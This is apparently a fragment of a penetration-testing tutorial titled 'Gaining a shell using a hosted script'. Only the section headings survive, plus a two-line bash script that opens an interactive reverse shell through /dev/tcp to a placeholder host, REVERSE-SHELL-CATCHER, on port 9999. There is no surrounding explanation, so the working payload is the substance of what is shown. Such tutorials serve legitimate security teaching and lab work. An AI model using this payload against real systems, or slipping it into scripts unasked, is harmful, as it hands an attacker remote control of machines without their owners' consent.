Gaining a shell using a hosted script
Introduction
What are we going to cover?
Steps to achieve this (DEMO)
#!/bin/bash
bash -i >& /dev/tcp/REVERSE-SHELL-CATCHER/9999 0>&1Additional references
Last updated